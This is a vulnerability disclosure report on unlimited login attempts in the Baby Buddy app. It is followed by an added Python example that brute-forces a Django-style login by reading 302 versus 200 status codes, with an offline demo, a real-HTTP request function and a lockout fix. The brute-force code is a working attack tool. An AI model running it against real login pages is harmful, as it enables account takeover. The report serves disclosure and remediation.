Improper Restriction of Excessive Authentication Attempts in babybuddy/babybuddy
Status: Valid
Jun 20th 2021
The login portal does not restrict the number of failed authentication attempts, which lets an attacker brute-force users' accounts.
🕵️‍♂️ Proof of Concept
Video POC: https://drive.google.com/file/d/1udzAGroSqDbEqPRYlUzv7bHgHq7oMNuk/view?usp=sharing
A wrong password returns HTTP 200, because the login page is simply re-rendered with an error message; a correct password returns a 302 redirect to the next page. Since the login view puts no limit on failed attempts, an attacker can submit candidate passwords in a loop and pick out the right one purely from the status code.
An attacker can therefore brute-force any user's password, which leads to account compromise.
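The status-code oracle described above, as an added example that is not part of the original report or of the Baby Buddy code base: it brute-forces a Django-style login form by treating a 302 as success, runs against a constructed in-memory fake so it works offline, and shows a per-account lockout wrapper of the kind that closes the issue. The login path `/login/`, the form field names, the `FAKE_USERS` credentials and the `LockoutGuard` class are assumptions made for the illustration; `make_http_poster` applies the same logic over real HTTP for a target you are authorised to test.

```python
"""Added example (not from the original report or the Baby Buddy project):
status-code oracle brute force against a Django-style login form, plus a
per-account lockout wrapper that closes the hole.

Assumptions (not verified against Baby Buddy's source): the form lives at
LOGIN_PATH, takes ``username``, ``password`` and ``csrfmiddlewaretoken``,
re-renders with HTTP 200 on a wrong password and answers HTTP 302 on a right one.
The offline demo talks to an in-memory fake; ``make_http_poster`` is the same
logic over real HTTP for a target you are authorised to test.
"""
import re
from collections import defaultdict
from typing import Callable, Iterable, Optional, Tuple

LOGIN_PATH = "/login/"          # assumption: Django's default login route
Response = Tuple[int, str]      # (HTTP status code, response body)
Poster = Callable[[str, str], Response]

# --- constructed fake target (stands in for the vulnerable app) -------------
FAKE_USERS = {"admin": "winter2021"}   # constructed credentials for the demo


def fake_login_post(username: str, password: str) -> Response:
    """Mimics the vulnerable view: 302 on success, 200 with the login page
    re-rendered on failure, and no limit on how often you may try."""
    if FAKE_USERS.get(username) == password:
        return 302, ""
    return 200, ('<form method="post"><ul class="errorlist"><li>Please enter a '
                 'correct username and password.</li></ul></form>')


# --- the oracle the report describes ----------------------------------------
def password_accepted(resp: Response) -> bool:
    """302 means the app redirected past the login page: the password was right."""
    return resp[0] == 302


def brute_force(post: Poster, username: str,
                wordlist: Iterable[str]) -> Tuple[Optional[str], int]:
    """Try every candidate; return (password or None, number of attempts made)."""
    attempts = 0
    for candidate in wordlist:
        attempts += 1
        if password_accepted(post(username, candidate)):
            return candidate, attempts
    return None, attempts


# --- the fix: stop answering after N failures for an account ----------------
class LockoutGuard:
    """Wraps a login handler and refuses further attempts for a username once
    ``limit`` consecutive failures have been seen (hypothetical helper; in a
    Django deployment this role is usually played by django-axes or similar)."""

    def __init__(self, post: Poster, limit: int = 5) -> None:
        self.post, self.limit = post, limit
        self.failures = defaultdict(int)

    def __call__(self, username: str, password: str) -> Response:
        if self.failures[username] >= self.limit:
            return 403, "Too many failed login attempts; try again later."
        resp = self.post(username, password)
        if password_accepted(resp):
            self.failures[username] = 0
        else:
            self.failures[username] += 1
        return resp


# --- same oracle over real HTTP (not exercised by the offline demo) ---------
def make_http_poster(base_url: str) -> Poster:
    """Fetch the form for its CSRF token, POST credentials, and report the raw
    status code without following the redirect that marks success."""
    import http.cookiejar, urllib.error, urllib.parse, urllib.request

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None      # surface the 302 as an HTTPError instead of following it

    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar()), NoRedirect)
    url = base_url.rstrip("/") + LOGIN_PATH

    def post(username: str, password: str) -> Response:
        page = opener.open(url).read().decode(errors="replace")
        match = re.search(r'name="csrfmiddlewaretoken" value="([^"]+)"', page)
        data = urllib.parse.urlencode({
            "csrfmiddlewaretoken": match.group(1) if match else "",
            "username": username, "password": password}).encode()
        req = urllib.request.Request(url, data=data, headers={"Referer": url})
        try:
            with opener.open(req) as r:
                return r.getcode(), r.read().decode(errors="replace")
        except urllib.error.HTTPError as e:   # 302 (and 403 from a lockout) land here
            return e.code, e.read().decode(errors="replace")
    return post


if __name__ == "__main__":
    words = ["password", "admin", "winter2021", "letmein"]
    print("vulnerable:", brute_force(fake_login_post, "admin", words))
    print("with lockout:", brute_force(LockoutGuard(fake_login_post, 2), "admin", words))
```

Against the unguarded handler the loop finds the password on the third attempt; behind `LockoutGuard` with a limit of two the same wordlist never yields a 302, because the correct password arrives after the account is already locked and is answered with 403. A real deployment should also rate-limit by source address, since an attacker can rotate usernames to stay under a per-account limit.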